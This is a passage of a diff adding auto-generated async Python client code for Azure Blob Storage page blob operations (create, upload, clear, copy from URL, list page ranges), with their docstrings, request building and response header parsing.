401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "PageBlob") # type: str + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_create_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_length=content_length, + blob_content_length=blob_content_length, + timeout=timeout, + tier=tier, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + blob_sequence_number=blob_sequence_number, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.create.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def upload_pages( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + body: IO, + transactional_content_md5: Optional[bytearray] = None, + transactional_content_crc64: Optional[bytearray] = None, + timeout: Optional[int] = None, + range: Optional[str] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + sequence_number_access_conditions: Optional["_models.SequenceNumberAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Upload Pages operation writes a range of pages to a page blob. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param sequence_number_access_conditions: Parameter group. Default value is None. + :type sequence_number_access_conditions: + ~azure.storage.blob.models.SequenceNumberAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "page". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword page_write: Required. You may specify one of the following options: + + + * Update: Writes the bytes specified by the request body into the specified range. The Range + and Content-Length headers must match to perform the update. + * Clear: Clears the specified range and releases the space used in storage for that range. To + clear a range, set the Content-Length header to zero, and the Range header to a value that + indicates the range to clear, up to maximum blob size. Default value is "update". Note that + overriding this default value may result in unsupported behavior. + :paramtype page_write: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "update") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_sequence_number_less_than_or_equal_to = None + _if_sequence_number_less_than = None + _if_sequence_number_equal_to = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if sequence_number_access_conditions is not None: + _if_sequence_number_less_than_or_equal_to = sequence_number_access_conditions.if_sequence_number_less_than_or_equal_to + _if_sequence_number_less_than = sequence_number_access_conditions.if_sequence_number_less_than + _if_sequence_number_equal_to = sequence_number_access_conditions.if_sequence_number_equal_to + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = body + + request = build_upload_pages_request( + url=self._config.url, + comp=comp, + page_write=page_write, + version=self._config.version, + content_type=content_type, + content=_content, + content_length=content_length, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + timeout=timeout, + range=range, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_sequence_number_less_than_or_equal_to=_if_sequence_number_less_than_or_equal_to, + if_sequence_number_less_than=_if_sequence_number_less_than, + if_sequence_number_equal_to=_if_sequence_number_equal_to, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.upload_pages.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + upload_pages.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def clear_pages( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + timeout: Optional[int] = None, + range: Optional[str] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + sequence_number_access_conditions: Optional["_models.SequenceNumberAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Clear Pages operation clears a set of pages from a page blob. + + :param content_length: The length of the request. + :type content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param sequence_number_access_conditions: Parameter group. Default value is None. + :type sequence_number_access_conditions: + ~azure.storage.blob.models.SequenceNumberAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "page". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword page_write: Required. You may specify one of the following options: + + + * Update: Writes the bytes specified by the request body into the specified range. The Range + and Content-Length headers must match to perform the update. + * Clear: Clears the specified range and releases the space used in storage for that range. To + clear a range, set the Content-Length header to zero, and the Range header to a value that + indicates the range to clear, up to maximum blob size. Default value is "clear". Note that + overriding this default value may result in unsupported behavior. + :paramtype page_write: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "clear") # type: str + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_sequence_number_less_than_or_equal_to = None + _if_sequence_number_less_than = None + _if_sequence_number_equal_to = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if sequence_number_access_conditions is not None: + _if_sequence_number_less_than_or_equal_to = sequence_number_access_conditions.if_sequence_number_less_than_or_equal_to + _if_sequence_number_less_than = sequence_number_access_conditions.if_sequence_number_less_than + _if_sequence_number_equal_to = sequence_number_access_conditions.if_sequence_number_equal_to + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_clear_pages_request( + url=self._config.url, + comp=comp, + page_write=page_write, + version=self._config.version, + content_length=content_length, + timeout=timeout, + range=range, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_sequence_number_less_than_or_equal_to=_if_sequence_number_less_than_or_equal_to, + if_sequence_number_less_than=_if_sequence_number_less_than, + if_sequence_number_equal_to=_if_sequence_number_equal_to, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.clear_pages.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + clear_pages.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def upload_pages_from_url( # pylint: disable=inconsistent-return-statements + self, + source_url: str, + source_range: str, + content_length: int, + range: str, + source_content_md5: Optional[bytearray] = None, + source_contentcrc64: Optional[bytearray] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + copy_source_authorization: Optional[str] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + sequence_number_access_conditions: Optional["_models.SequenceNumberAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + source_modified_access_conditions: Optional["_models.SourceModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Upload Pages operation writes a range of pages to a page blob where the contents are read + from a URL. + + :param source_url: Specify a URL to the copy source. + :type source_url: str + :param source_range: Bytes of source data in the specified range. The length of this range + should match the ContentLength header and x-ms-range/Range destination range header. + :type source_range: str + :param content_length: The length of the request. + :type content_length: long + :param range: The range of bytes to which the source range would be written. The range should + be 512 aligned and range-end is required. + :type range: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param source_contentcrc64: Specify the crc64 calculated for the range of bytes that must be + read from the copy source. Default value is None. + :type source_contentcrc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param sequence_number_access_conditions: Parameter group. Default value is None. + :type sequence_number_access_conditions: + ~azure.storage.blob.models.SequenceNumberAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword comp: comp. Default value is "page". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword page_write: Required. You may specify one of the following options: + + + * Update: Writes the bytes specified by the request body into the specified range. The Range + and Content-Length headers must match to perform the update. + * Clear: Clears the specified range and releases the space used in storage for that range. To + clear a range, set the Content-Length header to zero, and the Range header to a value that + indicates the range to clear, up to maximum blob size. Default value is "update". Note that + overriding this default value may result in unsupported behavior. + :paramtype page_write: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "update") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _lease_id = None + _if_sequence_number_less_than_or_equal_to = None + _if_sequence_number_less_than = None + _if_sequence_number_equal_to = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if sequence_number_access_conditions is not None: + _if_sequence_number_less_than_or_equal_to = sequence_number_access_conditions.if_sequence_number_less_than_or_equal_to + _if_sequence_number_less_than = sequence_number_access_conditions.if_sequence_number_less_than + _if_sequence_number_equal_to = sequence_number_access_conditions.if_sequence_number_equal_to + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + + request = build_upload_pages_from_url_request( + url=self._config.url, + comp=comp, + page_write=page_write, + version=self._config.version, + source_url=source_url, + source_range=source_range, + content_length=content_length, + range=range, + source_content_md5=source_content_md5, + source_contentcrc64=source_contentcrc64, + timeout=timeout, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + lease_id=_lease_id, + if_sequence_number_less_than_or_equal_to=_if_sequence_number_less_than_or_equal_to, + if_sequence_number_less_than=_if_sequence_number_less_than, + if_sequence_number_equal_to=_if_sequence_number_equal_to, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + request_id_parameter=request_id_parameter, + copy_source_authorization=copy_source_authorization, + template_url=self.upload_pages_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + upload_pages_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def get_page_ranges( + self, + snapshot: Optional[str] = None, + timeout: Optional[int] = None, + range: Optional[str] = None, + request_id_parameter: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> "_models.PageList": + """The Get Page Ranges operation returns the list of valid page ranges for a page blob or snapshot + of a page blob. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "pagelist". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: PageList, or the result of cls(response) + :rtype: ~azure.storage.blob.models.PageList + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.PageList"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "pagelist") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_get_page_ranges_request( + url=self._config.url, + comp=comp, + version=self._config.version, + snapshot=snapshot, + timeout=timeout, + range=range, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + marker=marker, + maxresults=maxresults, + template_url=self.get_page_ranges.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['x-ms-blob-content-length']=self._deserialize('long', response.headers.get('x-ms-blob-content-length')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('PageList', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_page_ranges.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def get_page_ranges_diff( + self, + snapshot: Optional[str] = None, + timeout: Optional[int] = None, + prevsnapshot: Optional[str] = None, + prev_snapshot_url: Optional[str] = None, + range: Optional[str] = None, + request_id_parameter: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> "_models.PageList": + """The Get Page Ranges Diff operation returns the list of valid page ranges for a page blob that + were changed between target blob and previous snapshot. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param prevsnapshot: Optional in version 2015-07-08 and newer. The prevsnapshot parameter is a + DateTime value that specifies that the response will contain only pages that were changed + between target blob and previous snapshot. Changed pages include both updated and cleared + pages. The target blob may be a snapshot, as long as the snapshot specified by prevsnapshot is + the older of the two. Note that incremental snapshots are currently supported only for blobs + created on or after January 1, 2016. Default value is None. + :type prevsnapshot: str + :param prev_snapshot_url: Optional. This header is only supported in service versions + 2019-04-19 and after and specifies the URL of a previous snapshot of the target blob. The + response will only contain pages that were changed between the target blob and its previous + snapshot. Default value is None. + :type prev_snapshot_url: str + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the 